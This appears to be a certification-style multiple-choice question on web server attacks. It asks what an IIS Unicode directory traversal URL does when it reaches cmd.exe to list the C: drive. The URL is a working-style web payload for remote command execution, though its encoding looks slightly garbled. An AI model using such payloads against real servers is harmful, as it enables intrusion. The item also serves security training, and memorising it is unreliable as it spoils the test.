What will the following URL produce in an unpatched IIS Web Server?

http://www.thetargetsite.com/scripts/..% co%af../..%co%af../windows/system32/cmd.exe?/c+dir+c:\

  • Directory listing of C: drive on the web server
  • Insert a Trojan horse into the C: drive of the web server
  • Execute a buffer flow in the C: drive of the web server
  • Directory listing of the C:\windows\system32 folder on the web server